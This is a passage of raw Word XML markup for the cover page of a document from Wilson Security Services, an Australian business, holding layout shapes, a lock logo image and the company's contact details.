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8294437" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="0" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1100877428"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="3C11D704" w14:textId="77777777" w:rsidR="0028153C" w:rsidRDefault="0028153C" w:rsidP="0028153C">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22FD0CEB" wp14:editId="04A45C36">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265714"/>
                    <wp:effectExtent l="0" t="0" r="635" b="0"/>
                    <wp:wrapNone/>
                    <wp:docPr id="467" name="Rectangle 467"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="2875915" cy="3265714"/>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5945DA" w14:textId="6C4CEB06" w:rsidR="00450739" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:spacing w:before="240"/>
                                  <w:jc w:val="center"/>
                                  <w:rPr>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:noProof/>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  </w:rPr>
                                  <w:drawing>
                                    <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DE13FD6" wp14:editId="362ABA31">
                                      <wp:extent cx="1933575" cy="1790700"/>
                                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                      <wp:docPr id="451" name="Picture 45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blue-hexagon-and-abstract-lock.png"/>
                                              <pic:cNvPicPr/>
                                            </pic:nvPicPr>
                                            <pic:blipFill>
                                              <a:blip r:embed="rId11">
                                                <a:extLst>
                                                  <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                                                    <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                                                      <a14:imgLayer r:embed="rId12">
                                                        <a14:imgEffect>
                                                          <a14:backgroundRemoval t="10000" b="90000" l="10000" r="90000">
                                                            <a14:foregroundMark x1="46479" y1="27113" x2="46127" y2="44014"/>
                                                            <a14:foregroundMark x1="49296" y1="24296" x2="51761" y2="37324"/>
                                                            <a14:foregroundMark x1="51761" y1="26408" x2="62676" y2="35211"/>
                                                            <a14:foregroundMark x1="46831" y1="28169" x2="45423" y2="36268"/>
                                                            <a14:foregroundMark x1="47887" y1="28521" x2="33099" y2="33099"/>
                                                            <a14:foregroundMark x1="51761" y1="38028" x2="54930" y2="47183"/>
                                                            <a14:foregroundMark x1="55986" y1="41901" x2="61620" y2="48944"/>
                                                            <a14:foregroundMark x1="63028" y1="45775" x2="48944" y2="53169"/>
                                                            <a14:foregroundMark x1="37324" y1="43310" x2="49296" y2="53521"/>
                                                            <a14:foregroundMark x1="51408" y1="37676" x2="51056" y2="39437"/>
                                                            <a14:foregroundMark x1="49296" y1="41901" x2="49296" y2="41901"/>
                                                            <a14:foregroundMark x1="50000" y1="38732" x2="55282" y2="44014"/>
                                                            <a14:backgroundMark x1="32042" y1="27465" x2="51056" y2="14789"/>
                                                            <a14:backgroundMark x1="50352" y1="15141" x2="71479" y2="27113"/>
                                                            <a14:backgroundMark x1="13380" y1="59507" x2="30282" y2="73592"/>
                                                            <a14:backgroundMark x1="30282" y1="73592" x2="72887" y2="66901"/>
                                                            <a14:backgroundMark x1="72887" y1="66901" x2="73944" y2="66901"/>
                                                            <a14:backgroundMark x1="88732" y1="64085" x2="69718" y2="74648"/>
                                                          </a14:backgroundRemoval>
                                                        </a14:imgEffect>
                                                      </a14:imgLayer>
                                                    </a14:imgProps>
                                                  </a:ext>
                                                  <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                                    <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                                                  </a:ext>
                                                </a:extLst>
                                              </a:blip>
                                              <a:stretch>
                                                <a:fillRect/>
                                              </a:stretch>
                                            </pic:blipFill>
                                            <pic:spPr>
                                              <a:xfrm>
                                                <a:off x="0" y="0"/>
                                                <a:ext cx="1933575" cy="1790700"/>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22FD0CEB" id="Rectangle 467" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:226.45pt;height:257.15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" fillcolor="#7f7f7f [1612]" stroked="f" strokeweight="1pt">
                    <v:textbox inset="14.4pt,14.4pt,14.4pt,28.8pt">
                      <w:txbxContent>
                        <w:p w14:paraId="335945DA" w14:textId="6C4CEB06" w:rsidR="00450739" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                          <w:pPr>
                            <w:spacing w:before="240"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:color w:val="FFFFFF" w:themeColor="background1"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:noProof/>
                              <w:color w:val="FFFFFF" w:themeColor="background1"/>
                            </w:rPr>
                            <w:drawing>
                              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DE13FD6" wp14:editId="362ABA31">
                                <wp:extent cx="1933575" cy="1790700"/>
                                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                <wp:docPr id="451" name="Picture 45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blue-hexagon-and-abstract-lock.png"/>
                                        <pic:cNvPicPr/>
                                      </pic:nvPicPr>
                                      <pic:blipFill>
                                        <a:blip r:embed="rId13">
                                          <a:extLst>
                                            <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                                              <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                                                <a14:imgLayer r:embed="rId14">
                                                  <a14:imgEffect>
                                                    <a14:backgroundRemoval t="10000" b="90000" l="10000" r="90000">
                                                      <a14:foregroundMark x1="46479" y1="27113" x2="46127" y2="44014"/>
                                                      <a14:foregroundMark x1="49296" y1="24296" x2="51761" y2="37324"/>
                                                      <a14:foregroundMark x1="51761" y1="26408" x2="62676" y2="35211"/>
                                                      <a14:foregroundMark x1="46831" y1="28169" x2="45423" y2="36268"/>
                                                      <a14:foregroundMark x1="47887" y1="28521" x2="33099" y2="33099"/>
                                                      <a14:foregroundMark x1="51761" y1="38028" x2="54930" y2="47183"/>
                                                      <a14:foregroundMark x1="55986" y1="41901" x2="61620" y2="48944"/>
                                                      <a14:foregroundMark x1="63028" y1="45775" x2="48944" y2="53169"/>
                                                      <a14:foregroundMark x1="37324" y1="43310" x2="49296" y2="53521"/>
                                                      <a14:foregroundMark x1="51408" y1="37676" x2="51056" y2="39437"/>
                                                      <a14:foregroundMark x1="49296" y1="41901" x2="49296" y2="41901"/>
                                                      <a14:foregroundMark x1="50000" y1="38732" x2="55282" y2="44014"/>
                                                      <a14:backgroundMark x1="32042" y1="27465" x2="51056" y2="14789"/>
                                                      <a14:backgroundMark x1="50352" y1="15141" x2="71479" y2="27113"/>
                                                      <a14:backgroundMark x1="13380" y1="59507" x2="30282" y2="73592"/>
                                                      <a14:backgroundMark x1="30282" y1="73592" x2="72887" y2="66901"/>
                                                      <a14:backgroundMark x1="72887" y1="66901" x2="73944" y2="66901"/>
                                                      <a14:backgroundMark x1="88732" y1="64085" x2="69718" y2="74648"/>
                                                    </a14:backgroundRemoval>
                                                  </a14:imgEffect>
                                                </a14:imgLayer>
                                              </a14:imgProps>
                                            </a:ext>
                                            <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                              <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                                            </a:ext>
                                          </a:extLst>
                                        </a:blip>
                                        <a:stretch>
                                          <a:fillRect/>
                                        </a:stretch>
                                      </pic:blipFill>
                                      <pic:spPr>
                                        <a:xfrm>
                                          <a:off x="0" y="0"/>
                                          <a:ext cx="1933575" cy="1790700"/>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69504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BFA8988" wp14:editId="357B0065">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>3035069</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>-622869</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="2875915" cy="301752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875915" cy="3017520"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln>
                              <a:noFill/>
                            </a:ln>
                          </wps:spPr>
                          <wps:txbx>
                            <w:txbxContent>
                              <w:p w14:paraId="4A4E8E6B" w14:textId="6CF5F6FE" w:rsidR="00450739" w:rsidRPr="00E21FD1" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:spacing w:line="240" w:lineRule="auto"/>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ILSON</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="42BA8560" w14:textId="77777777" w:rsidR="00450739" w:rsidRPr="00E21FD1" w:rsidRDefault="00450739" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:spacing w:line="240" w:lineRule="auto"/>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21FD1">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CUR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BFA8988" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                    <v:stroke joinstyle="miter"/>
                    <v:path gradientshapeok="t" o:connecttype="rect"/>
                  </v:shapetype>
                  <v:shape id="Text Box 18" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:239pt;margin-top:-49.05pt;width:226.45pt;height:237.6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" filled="f" stroked="f">
                    <v:textbox style="mso-fit-shape-to-text:t">
                      <w:txbxContent>
                        <w:p w14:paraId="4A4E8E6B" w14:textId="6CF5F6FE" w:rsidR="00450739" w:rsidRPr="00E21FD1" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                          <w:pPr>
                            <w:spacing w:line="240" w:lineRule="auto"/>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WILSON</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="42BA8560" w14:textId="77777777" w:rsidR="00450739" w:rsidRPr="00E21FD1" w:rsidRDefault="00450739" w:rsidP="0028153C">
                          <w:pPr>
                            <w:spacing w:line="240" w:lineRule="auto"/>
                            <w:jc w:val="center"/>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E21FD1">
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
                              <w:sz w:val="72"/>
                              <w:szCs w:val="7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SECURITY</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ACB024D" wp14:editId="6924151E">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8150773"/>
                    <wp:effectExtent l="0" t="0" r="15240" b="22225"/>
                    <wp:wrapNone/>
                    <wp:docPr id="468" name="Rectangle 468"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="3108960" cy="8150773"/>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0</wp14:pctHeight>
                    </wp14:sizeRelV>
                  </wp:anchor>
                </w:drawing>
              </mc:Choice>
              <mc:Fallback>
                <w:pict>
                  <v:rect w14:anchorId="50D59084" id="Rectangle 468" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:244.8pt;height:641.8pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:400;mso-height-percent:0;mso-left-percent:440;mso-top-percent:25;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-percent:400;mso-height-percent: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14:anchorId="284B153D" wp14:editId="637A89DE">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FA1994B" w14:textId="77777777" w:rsidR="00450739" w:rsidRDefault="00450739" w:rsidP="0028153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84B153D"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7N1g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" fillcolor="#d9e2f3 [660]" stroked="f" strokeweight="1pt">
                    <v:fill color2="#8eaadb [1940]" rotate="t" focus="100%" type="gradient">
                      <o:fill v:ext="view" type="gradientUnscaled"/>
                    </v:fill>
                    <v:textbox inset="21.6pt,,21.6pt">
                      <w:txbxContent>
                        <w:p w14:paraId="4FA1994B" w14:textId="77777777" w:rsidR="00450739" w:rsidRDefault="00450739" w:rsidP="0028153C"/>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap anchorx="page" anchory="page"/>
                  </v:rect>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
        <w:p w14:paraId="13729A82" w14:textId="69D711E5" w:rsidR="0028153C" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7EB9FD7E" wp14:editId="2E2636D8">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="margin">
                      <wp:posOffset>2495550</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>1657350</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="3124200" cy="63373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124200" cy="633730"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln>
                              <a:noFill/>
                            </a:ln>
                          </wps:spPr>
                          <wps:txbx>
                            <w:txbxContent>
                              <w:p w14:paraId="031042A6" w14:textId="3C8AAA55" w:rsidR="00450739" w:rsidRPr="00C56ED8" w:rsidRDefault="00450739" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:spacing w:before="240"/>
                                  <w:jc w:val="center"/>
                                  <w:rPr>
                                    <w:b/>
                                    <w:color w:val="70AD47"/>
                                    <w:spacing w:val="10"/>
                                    <w:sz w:val="34"/>
                                    <w:szCs w:val="3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C56ED8">
                                  <w:rPr>
                                    <w:b/>
                                    <w:color w:val="70AD47"/>
                                    <w:spacing w:val="10"/>
                                    <w:sz w:val="34"/>
                                    <w:szCs w:val="3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ww.</w:t>
                                </w:r>
                                <w:r w:rsidR="00C56ED8" w:rsidRPr="00C56ED8">
                                  <w:rPr>
                                    <w:b/>
                                    <w:color w:val="70AD47"/>
                                    <w:spacing w:val="10"/>
                                    <w:sz w:val="34"/>
                                    <w:szCs w:val="3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ilson</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00C56ED8">
                                  <w:rPr>
                                    <w:b/>
                                    <w:color w:val="70AD47"/>
                                    <w:spacing w:val="10"/>
                                    <w:sz w:val="34"/>
                                    <w:szCs w:val="3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ecurity.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9FD7E" id="Text Box 27" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:196.5pt;margin-top:130.5pt;width:246pt;height:49.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" filled="f" stroked="f">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w14:paraId="031042A6" w14:textId="3C8AAA55" w:rsidR="00450739" w:rsidRPr="00C56ED8" w:rsidRDefault="00450739" w:rsidP="0028153C">
                          <w:pPr>
                            <w:spacing w:before="240"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="70AD47"/>
                              <w:spacing w:val="10"/>
                              <w:sz w:val="34"/>
                              <w:szCs w:val="3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C56ED8">
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="70AD47"/>
                              <w:spacing w:val="10"/>
                              <w:sz w:val="34"/>
                              <w:szCs w:val="3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ww.</w:t>
                          </w:r>
                          <w:r w:rsidR="00C56ED8" w:rsidRPr="00C56ED8">
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="70AD47"/>
                              <w:spacing w:val="10"/>
                              <w:sz w:val="34"/>
                              <w:szCs w:val="3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Wilson</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00C56ED8">
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="70AD47"/>
                              <w:spacing w:val="10"/>
                              <w:sz w:val="34"/>
                              <w:szCs w:val="3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ecurity.com.au</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6F07F924" wp14:editId="6F1942E7">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:posOffset>3533775</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:posOffset>6393815</wp:posOffset>
                    </wp:positionV>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17BB698" id="Rectangle 469" o:spid="_x0000_s1026" style="position:absolute;margin-left:278.25pt;margin-top:503.45pt;width:226.45pt;height:9.35pt;z-index:251662336;visibility:visible;mso-wrap-style:square;mso-width-percent:370;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:page;mso-width-percent:37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" fillcolor="#4472c4 [3204]" stroked="f" strokeweight="1pt">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0DF9673F" wp14:editId="2E237BD9">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:posOffset>3562349</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:posOffset>6591300</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="2886075" cy="164274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886075" cy="1642745"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln w="6350">
                              <a:noFill/>
                            </a:ln>
                            <a:effectLst/>
                          </wps:spPr>
                          <wps:txbx>
                            <w:txbxContent>
                              <w:p w14:paraId="23B44E66" w14:textId="6E1AD398" w:rsidR="00450739" w:rsidRPr="00032E3E" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni"/>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni"/>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t>Wilson</w:t>
                                </w:r>
                                <w:r w:rsidR="00450739" w:rsidRPr="00032E3E">
                                  <w:rPr>
                                    <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni" w:hint="cs"/>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> Security Services </w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="75D20671" w14:textId="77777777" w:rsidR="00450739" w:rsidRDefault="00450739" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                </w:pPr>
                              </w:p>
                              <w:p w14:paraId="38AE7F43" w14:textId="77777777" w:rsidR="00C56ED8" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>5/9</w:t>
                                </w:r>
                                <w:r w:rsidR="00450739" w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> </w:t>
                                </w:r>
                                <w:r>
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>Cooma</w:t>
                                </w:r>
                                <w:r w:rsidR="00450739" w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> </w:t>
                                </w:r>
                                <w:r>
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>St</w:t>
                                </w:r>
                                <w:r w:rsidR="00450739" w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">. </w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="71DBEBBD" w14:textId="451ED2A9" w:rsidR="00450739" w:rsidRPr="00605856" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>PRESTON</w:t>
                                </w:r>
                                <w:r w:rsidR="00450739" w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>, 3</w:t>
                                </w:r>
                                <w:r>
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>072</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="1CEFA14E" w14:textId="1CDFBACA" w:rsidR="00450739" w:rsidRPr="00605856" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">VIC, </w:t>
                                </w:r>
                                <w:r w:rsidR="00450739" w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>Australia</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="300BF9B0" w14:textId="3D7A2035" w:rsidR="00450739" w:rsidRPr="00605856" w:rsidRDefault="00450739" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>Tel</w:t>
                                </w:r>
                                <w:r w:rsidR="006D021D">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>ephone</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>: +61</w:t>
                                </w:r>
                                <w:r w:rsidR="00C56ED8">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> 435937871</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="5676B24C" w14:textId="3CA01704" w:rsidR="00450739" w:rsidRPr="00605856" w:rsidRDefault="00450739" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>Email: info@</w:t>
                                </w:r>
                                <w:r w:rsidR="00C56ED8">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>wilson</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">sec.com </w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="22A2F3E3" w14:textId="2B553F07" w:rsidR="00450739" w:rsidRPr="00605856" w:rsidRDefault="00450739" w:rsidP="0028153C">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:noProof/>
                                    <w:color w:val="44546A" w:themeColor="text2"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>Web:</w:t>
                                </w:r>
                                <w:r w:rsidR="00C56ED8">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> </w:t>
                                </w:r>
                                <w:r w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>https://www.</w:t>
                                </w:r>
                                <w:r w:rsidR="00C56ED8">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>Wilson</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00605856">
                                  <w:rPr>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>Security.com.au</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DF9673F" id="Text Box 465" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:280.5pt;margin-top:519pt;width:227.25pt;height:129.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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w14:paraId="23B44E66" w14:textId="6E1AD398" w:rsidR="00450739" w:rsidRPr="00032E3E" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>Wilson</w:t>
                          </w:r>
                          <w:r w:rsidR="00450739" w:rsidRPr="00032E3E">
                            <w:rPr>
                              <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni" w:hint="cs"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> Security Services </w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="75D20671" w14:textId="77777777" w:rsidR="00450739" w:rsidRDefault="00450739" w:rsidP="0028153C">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                          </w:pPr>
                        </w:p>
                        <w:p w14:paraId="38AE7F43" w14:textId="77777777" w:rsidR="00C56ED8" w:rsidRDefault="00C56ED8" w:rsidP="0028153C">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>5/9</w:t>
                          </w:r>
                          <w:r w:rsidR="00450739" w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>Cooma</w:t>
                          </w:r>
                          <w:r w:rsidR="00450739" w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>St</w:t>
                          </w:r>
                          <w:r w:rsidR="00450739" w:rsidRPr="00605856">
                            <w:rPr>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t xml:space="preserve">. </w:t>
